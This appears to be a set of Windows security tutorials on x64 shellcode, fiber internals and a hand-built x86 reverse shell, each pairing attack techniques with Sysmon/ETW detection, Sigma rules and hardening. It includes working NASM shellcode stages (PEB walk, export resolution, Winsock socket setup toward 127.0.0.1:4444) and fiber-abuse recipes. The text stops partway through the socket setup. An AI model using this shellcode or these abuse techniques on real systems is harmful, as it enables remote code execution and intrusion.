    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8 — CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
EventID 10 — ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (read + VM-write).
EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer, bypassed by no usermode hook.
Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) from `MEM_PRIVATE`-allocated path
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti `NtQueueApcThread` to remote thread; alerted thread-start addresses
Process Hollowing	`T1055.012`	`EventID 1` with suspended child, followed by `EventID 10` write + resume
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
The TEB is reached via gs:[0x60] on x64; every PEB offset (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

References

Fibers: User-Mode Cooperative Threads

Objective: Understand the internals of Windows fibers — how they relate to the TEB, the undocumented FIBER structure, Fiber Local Storage, and the cooperative context switch performed entirely in user mode — so defenders can recognize and detect adversarial use of fiber APIs for stealthy in-process execution.

1. Cooperative vs. Preemptive Scheduling

A thread is the Windows kernel’s unit of execution. The scheduler picks ready threads, slices CPU time, and preempts them at quantum boundaries — all driven from ntoskrnl.exe. A fiber is different: it is a unit of execution that the kernel does not know about. Fibers run inside threads, and the application — not the OS — chooses when one fiber yields and another runs.

Two consequences follow immediately:

A fiber switch never crosses the user/kernel boundary. No syscall is issued. SwitchToFiber lives in KernelBase.dll and returns without touching ntoskrnl.
From the kernel’s perspective, all activity performed by a fiber is attributed to the thread that runs it. Accessing TLS from a fiber accesses the thread’s TLS, not a per-fiber slot.

This is the root of both the elegance and the security relevance of fibers: they are coroutines built directly into the Win32 ABI, with stack pivots and register saves the kernel cannot see.

2. The Fiber Execution Model

A fiber consists of three things: a stack, a saved CPU context (registers, instruction pointer, SEH frame), and a start routine that receives an opaque parameter. A thread becomes “fiber-aware” by calling ConvertThreadToFiber, at which point that thread is permanently a fiber host until it calls ConvertFiberToThread.

Rule	Behavior
Must convert first	You cannot call `SwitchToFiber` from a thread until `ConvertThreadToFiber` runs.
Fiber function returning	If a fiber’s start routine returns, the host thread calls `ExitThread` and terminates.
Self-delete	If the currently running fiber calls `DeleteFiber` on itself, the host thread exits.
Cross-thread delete	Deleting a fiber that is the selected fiber of another thread will likely crash that thread — its stack just disappeared.
Cross-thread switch	`SwitchToFiber` accepts a fiber created by a different thread; the caller becomes the new host.

These rules are load-bearing — most fiber bugs (and several known abuse primitives) come from violating them.

3. TEB Layout and the FIBER Structure

The Thread Environment Block (TEB) tracks the per-thread fiber state. Three fields matter:

Field	Type	Role
`NtTib.FiberData`	`PVOID`	Pointer to the current fiber’s `FIBER` structure
`HasFiberData`	`USHORT : 1`	Bitfield set by `ConvertThreadToFiberEx`; indicates the thread hosts fibers
`FlsData`	`PVOID`	Pointer to the FLS slot array for the current fiber

ConvertThreadToFiberEx calls NtCurrentTeb(), checks Teb->HasFiberData, and if the thread is already a fiber returns with ERROR_ALREADY_FIBER. Otherwise it allocates a FIBER structure on the process heap via RtlAllocateHeap and stores its address in NtTib.FiberData.

The FIBER struct itself is not officially documented. The shape below is reconstructed from ReactOS sources and public symbols and is subject to change across Windows versions:

// Reconstructed from public symbols / ReactOS — illustrative only.
typedef struct _FIBER {
    PVOID    FiberData;          // lpParameter passed at creation
    PVOID    ExceptionList;      // Top of SEH chain (NT_TIB.ExceptionList)
    PVOID    StackBase;          // High end of the fiber stack
    PVOID    StackLimit;         // Low end (guard page)
    PVOID    DeallocationStack;  // Original VirtualAlloc base
    CONTEXT  FiberContext;       // Saved CPU state: RIP, RSP, RBP, RBX, ...
    ULONG    FiberFlags;         // FIBER_FLAG_FLOAT_SWITCH, etc.
    PVOID    ActivationContext;  // Per-fiber activation context stack
    PVOID    FlsSlots;           // Per-fiber FLS slot array
} FIBER, *PFIBER;

You must never read or write this structure directly. The Win32 fiber functions manage its contents; treating the returned LPVOID as opaque is part of the contract.

4. The Core Fiber API

The full surface is small. Most of winbase.h and fibersapi.h boils down to these functions:

Function	Purpose
`ConvertThreadToFiber`	Promote the calling thread into a fiber; required first
`ConvertThreadToFiberEx`	As above; accepts `FIBER_FLAG_FLOAT_SWITCH`
`CreateFiber`	Allocate stack + `FIBER` struct; record entry point and parameter
`CreateFiberEx`	As above; accepts `dwStackCommitSize` and flags
`SwitchToFiber`	Cooperative context switch to the supplied fiber
`DeleteFiber`	Free the fiber’s stack, context, and `FIBER` data
`ConvertFiberToThread`	Demote back to a plain thread; required to avoid leaks
`GetCurrentFiber`	Returns the current `FIBER` address (intrinsic — no `CALL`)
`GetFiberData`	Returns the `lpParameter` value (intrinsic — no `CALL`)

The exact CreateFiber signature, per MSDN:

LPVOID CreateFiber(
    SIZE_T                dwStackSize,    // 0 = default, grows up to 1 MB
    LPFIBER_START_ROUTINE lpStartAddress, // void StartRoutine(LPVOID lpParameter)
    LPVOID                lpParameter     // passed to the fiber function
);

GetCurrentFiber and GetFiberData are compiler intrinsics on MSVC — they inline directly to a gs:[0x20]/fs:[0x10] read of NtTib.FiberData. They produce no import thunk and no CALL instruction, which has direct consequences for IAT-based detection.

5. Fiber Lifecycle: A Minimal Example

This walks the canonical create → switch → yield → delete sequence. Note how g_mainFiber is the fiber identity of the original thread, returned by ConvertThreadToFiber.

#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber  = NULL;
LPVOID g_workFiber  = NULL;

VOID CALLBACK WorkerFiberProc(LPVOID lpParam) {
    printf("[worker] running on fiber %p, param=%p\n",
           GetCurrentFiber(), lpParam);

    // Cooperative yield — control returns to the main fiber.
    SwitchToFiber(g_mainFiber);

    printf("[worker] resumed; returning will ExitThread()\n");
    SwitchToFiber(g_mainFiber);   // never let the routine return
}

int main(void) {
    // Promote thread; TEB->HasFiberData becomes 1.
    g_mainFiber = ConvertThreadToFiber(NULL);

    // 64 KiB stack; entry = WorkerFiberProc; param = 0xDEADBEEF.
    g_workFiber = CreateFiber(0x10000, WorkerFiberProc, (LPVOID)0xDEADBEEF);

    SwitchToFiber(g_workFiber);   // first run of worker
    printf("[main] back from worker\n");
    SwitchToFiber(g_workFiber);   // resume worker

    DeleteFiber(g_workFiber);     // safe: not the running fiber
    ConvertFiberToThread();       // demote; release fiber bookkeeping
    return 0;
}

Forgetting ConvertFiberToThread leaks the main fiber’s FIBER allocation on the process heap. Forgetting to yield back before the worker returns terminates the host thread via ExitThread.

6. Context Switching Internals

SwitchToFiber is the heart of the API. Conceptually, it performs:

Save the current CPU state (RBX, RBP, RDI, RSI, R12–R15, RSP, RIP on x64) into the current fiber’s FiberContext.
Save the SEH chain head (NtTib.ExceptionList) and stack bounds (StackBase, StackLimit) into the current FIBER.
If FIBER_FLAG_FLOAT_SWITCH is set, save the XMM/MMX/x87 state.
Update NtTib.FiberData to point at the target FIBER.
Restore the target fiber’s stack bounds, SEH chain, FLS pointer, and CPU registers.
Return to the saved instruction pointer of the target — execution resumes there on the target’s stack.

Critically, this is a pure user-mode operation. No syscall, no int 2e, no ETW event from Microsoft-Windows-Kernel-Process. The host thread’s kernel-visible state (KTHREAD, ETHREAD) is unchanged; only RIP/RSP move from the kernel’s view.

; Conceptual sketch — SwitchToFiber x64 prologue
mov     gs:[0x20], rcx          ; NtTib.FiberData = target
mov     [rax + FiberContextOff + Rsp], rsp
mov     [rax + FiberContextOff + Rip], <return addr>
; ... restore target ...
mov     rsp, [rcx + FiberContextOff + Rsp]
jmp     qword [rcx + FiberContextOff + Rip]

Flow diagram showing the six steps of SwitchToFiber: saving registers, saving SEH and stack bounds, updating NtTib.FiberData, restoring target registers, and jumping to the target fiber's saved RIP — all in user mode with no syscall — SwitchToFiber completes an entire stack-and-register swap inside KernelBase.dll without issuing a single syscall or generating a kernel ETW event.

7. Fiber Local Storage (FLS)

TLS is per-thread. During a fiber switch the TEB’s TLS array is not swapped, so two fibers sharing a thread share TLS — a classic source of corruption when porting thread-based libraries to fibers. FLS solves this: it is per-fiber, and SwitchToFiber updates TEB->FlsData to the incoming fiber’s slot array.

Function	Purpose
`FlsAlloc(PFLS_CALLBACK_FUNCTION)`	Allocate an FLS index; optional destructor callback
`FlsSetValue(DWORD, PVOID)`	Store a per-fiber value at the given index
`FlsGetValue(DWORD)`	Read the current fiber’s value at the given index
`FlsFree(DWORD)`	Release the index; callbacks fire for live fibers

The destructor callback pointers are kept process-wide in PEB->FlsCallback. They fire on fiber deletion and thread exit, and — as covered below — they are a known abuse target.

DWORD g_flsIndex;

VOID WINAPI OnFlsDestroy(PVOID p) {
    HeapFree(GetProcessHeap(), 0, p);
}

VOID CALLBACK FiberA(LPVOID _) {
    char *buf = (char*)HeapAlloc(GetProcessHeap(), 0, 32);
    lstrcpyA(buf, "fiber-A-private");
    FlsSetValue(g_flsIndex, buf);
    SwitchToFiber(g_mainFiber);
    printf("[A] still mine: %s\n", (char*)FlsGetValue(g_flsIndex));
    SwitchToFiber(g_mainFiber);
}

int wmain(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    g_flsIndex  = FlsAlloc(OnFlsDestroy);
    // ... create FiberA, FiberB, switch between them ...
    // Each fiber sees its own FlsGetValue(g_flsIndex) result.
}

Hierarchy diagram showing how PEB holds FlsCallback destructor pointers, TEB holds NtTib.FiberData pointing to the FIBER structure and FlsData pointing to the per-fiber FLS slot array, with the destructor relationship between PEB FlsCallback and the slot array — FLS slot arrays are swapped per-fiber on every SwitchToFiber call, while PEB→FlsCallback holds process-wide destructor pointers that fire on fiber deletion — a known adversarial overwrite target.

8. Building a Round-Robin Cooperative Scheduler

Fibers shine when modeling cooperative pipelines: parsers, generators, state machines. A trivial scheduler is a dispatcher fiber that round-robins through worker fibers, each of which yields back via SwitchToFiber(g_mainFiber).

#define N 3
LPVOID g_workers[N];
LPVOID g_mainFiber;

VOID CALLBACK Worker(LPVOID id) {
    for (int i = 0; i < 4; ++i) {
        printf("[worker %llu] step %d\n", (ULONG_PTR)id, i);
        SwitchToFiber(g_mainFiber);   // yield
    }
    // Final yield — never return from a fiber routine.
    SwitchToFiber(g_mainFiber);
}

int main(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    for (ULONG_PTR i = 0; i < N; ++i)
        g_workers[i] = CreateFiber(0, Worker, (LPVOID)i);

    for (int round = 0; round < 4; ++round)
        for (int i = 0; i < N; ++i)
            SwitchToFiber(g_workers[i]);

    for (int i = 0; i < N; ++i) DeleteFiber(g_workers[i]);
    ConvertFiberToThread();
    return 0;
}

This is the same pattern Microsoft SQL Server used for its historical “lightweight pooling” / fiber mode — one OS thread, many SQL user contexts.

9. Legitimate Use Cases and Pitfalls

Use Case	Reason
Coroutines / generators	Native stack switching with no `setjmp` tricks
Porting cooperative legacy code	UNIX `swapcontext`-style schedulers map cleanly
Database engines	SQL Server fiber mode for high-concurrency workloads
Game engines / scripting hosts	Per-script execution context with explicit yield

Pitfalls are sharp:

COM is apartment-affinitive to threads, not fibers. Initializing COM on one fiber and using it from another corrupts COM bookkeeping.
CRT and many MS libraries stash state in TLS. Switching fibers leaves that state behind, producing subtle corruption.
Critical sections record the thread as the owner — a different fiber on the same thread re-enters without blocking.
Stack-cookies and __try/__except rely on SEH chain integrity; SwitchToFiber handles this, but raw RtlInstallFunctionTableCallback on a fiber stack must use the fiber’s StackBase/StackLimit.

10. Common Attacker Techniques

Fibers are attractive to adversaries because the entire execution primitive lives in user mode — no NtCreateThread, no CreateRemoteThread, no kernel ETW event for the act of switching execution. The patterns below are documented in public threat-research literature; described conceptually here for detection engineers.

Technique	Description
In-process shellcode via `SwitchToFiber`	Allocate `PAGE_EXECUTE_READWRITE` memory, copy a payload, call `ConvertThreadToFiber` then `CreateFiber` with the payload as `lpStartAddress`, then `SwitchToFiber` — execution begins with no new thread
Fiber-based ROP staging	A fiber’s saved `CONTEXT` includes `RIP` and `RSP`; manipulating a `FIBER` struct’s context fields lets an attacker pivot the stack on `SwitchToFiber`
`PEB->FlsCallback` overwrite	Overwrite an entry in the process-wide FLS callback array; on the next `FlsFree` or fiber/thread teardown the attacker-controlled pointer is invoked with attacker-controlled data
TLS evasion via FLS	Hide per-task state in FLS slots that defensive tooling enumerating TLS will miss
API hiding via intrinsics	`GetCurrentFiber`/`GetFiberData` produce no IAT entry; static analysis missing `gs:[0x20]` reads will not see fiber-aware code

The base ATT&CK parent for fiber-based in-process execution is T1055 Process Injection; MITRE has not assigned a fiber-specific sub-technique, so the closest analogue is T1055.004 (APC) which shares the “queue execution to a thread’s user-mode context” model.

11. Defensive Strategies & Detection

There is no kernel event for SwitchToFiber. Detection must focus on the setup that precedes fiber-based execution (RWX allocation, suspicious entry points) and on memory forensics of fiber state at rest.

Sysmon coverage for the surrounding behavior:

Event ID	Signal
`1`	Process Create — establish baseline lineage
`8`	`CreateRemoteThread` — co-occurs with cross-process fiber staging
`10`	`ProcessAccess` — reflective loaders reading remote memory before fiber dispatch
`17`/`18`	Named-pipe create/connect — common multi-stage loader IPC
`25`	`ProcessTampering` — image-region tampering in a fiber host

ETW providers worth subscribing:

Microsoft-Windows-Threat-Intelligence — flags VirtualAlloc/VirtualProtect with PAGE_EXECUTE_*, the precursor to fiber shellcode staging.
Microsoft-Windows-Kernel-Process — does not see fiber switches but covers process/thread lifecycle.
A user-mode consumer hooking NtAllocateVirtualMemory + NtProtectVirtualMemory gives the strongest pre-execution signal.

Memory forensics indicators:

Walk TEB.NtTib.FiberData on every thread. Threads with HasFiberData == 1 in processes that have no business using fibers are immediately interesting.
Use Volatility malfind to surface private, executable, non-image-backed pages — the target of a fiber-staged payload.
Dump PEB->FlsCallback and verify every entry resolves to an expected module’s .text section.

Sigma sketch for the cross-process precursor to fiber-based payload staging:

title: Suspicious ProcessAccess Preceding User-Mode Fiber Execution
id: 8f5c1d6e-3c7b-4b1f-9e1e-7e3e6e2b0a1f
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1fffff'   # PROCESS_ALL_ACCESS
      - '0x1f0fff'
    TargetImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\SenseIR.exe'
  condition: selection and not filter_legit
level: high
tags:
  - attack.t1055
  - attack.t1106

Hardening:

SetProcessMitigationPolicy with ProcessDynamicCodePolicy (Arbitrary Code Guard) blocks creation of new executable pages, defeating fiber shellcode staging.
Control Flow Guard restricts indirect-call targets, narrowing SwitchToFiber and FLS-callback abuse to valid entry points.
HVCI / memory integrity prevents kernel-side tampering of FIBER structures via vulnerable drivers.
WDAC / AppLocker policies that deny PAGE_EXECUTE_* allocations on non-JIT processes raise the cost of any in-process execution primitive.

Graph diagram mapping fiber abuse detection signals: RWX allocation feeding ETW Threat-Intelligence provider and Sysmon events, memory forensics walking PEB FlsCallback for non-text-section pointers, and ACG/CFG/HVCI as hardening mitigations — Because SwitchToFiber produces no kernel telemetry, defenders must pivot to pre-execution signals like RWX allocations, memory forensics on FiberData and FlsCallback, and ACG to deny executable page creation entirely.

12. Tools for Fiber Analysis

Tool	Description	Link
WinDbg	Dump `TEB`, walk `NtTib.FiberData`, inspect `FIBER.FiberContext`	`microsoft.com`
Process Hacker	Enumerate threads, inspect TEB, examine private RWX regions	`processhacker.sf.io`
Process Monitor	Capture `VirtualAlloc`/`VirtualProtect` sequences preceding fiber dispatch	`sysinternals.com`
Volatility 3	`windows.malfind`, TEB plugins, FLS callback inspection	`volatilityfoundation.org`
pykd / WinDbg JS	Scripted walks of `FIBER` chains across all threads	`githomelab.ru/pykd`
x64dbg	User-mode debugging of fiber-aware binaries; trace `gs:[0x20]` reads	`x64dbg.com`
Ghidra	Static analysis; recognize `GetCurrentFiber` intrinsic pattern	`ghidra-sre.org`
Sysmon	Surrounding telemetry (Events `1`, `8`, `10`, `25`)	`sysinternals.com`

A minimal WinDbg recipe to surface fiber-hosting threads in a captured process:

0:000> !teb
TEB at 000000abcd123000
    ...
    NtTib.FiberData:  0000020fabcde000
    ...
0:000> dt ntdll!_TEB @$teb HasFiberData
0:000> dq 0000020fabcde000 L40   ; raw FIBER bytes — layout version-dependent

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	`T1055`	Memory scan for private RWX regions; ETW TI on `NtAllocateVirtualMemory`
Process Injection: Asynchronous Procedure Call	`T1055.004`	Closest published sub-technique to fiber-based in-process execution
Native API	`T1106`	API-call auditing of `CreateFiber`/`SwitchToFiber`/`FlsAlloc`
Reflective Code Loading	`T1620`	Image-load anomalies; fiber entry point in non-image-backed memory
Impair Defenses: Disable or Modify Tools	`T1562.001`	ETW/AMSI hook integrity checks; user-mode hook auditing

MITRE ATT&CK does not currently list a “Fiber Injection” sub-technique (current as of v16.1). Vendor research treats fiber-based execution as a variant of T1055; map accordingly.

Summary

A fiber is a user-mode cooperative thread invisible to the kernel scheduler — SwitchToFiber performs a stack and register swap entirely in KernelBase.dll with no syscall.
The TEB exposes the fiber state via NtTib.FiberData, HasFiberData, and FlsData; the FIBER structure itself is undocumented and version-dependent.
TLS is per-thread and is not swapped on a fiber switch; FLS is per-fiber and is swapped, with destructor callbacks tracked in PEB->FlsCallback.
Adversaries abuse fibers for in-process shellcode execution, ROP staging via the saved CONTEXT, and code execution via PEB->FlsCallback overwrites — none of which trigger thread-creation telemetry.
Detect via pre-execution signals (ETW TI on RWX allocations, Sysmon Event IDs 8/10/25), memory forensics on private executable regions and FlsCallback integrity, and hardening with ACG, CFG, and HVCI.

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address — Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress — Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
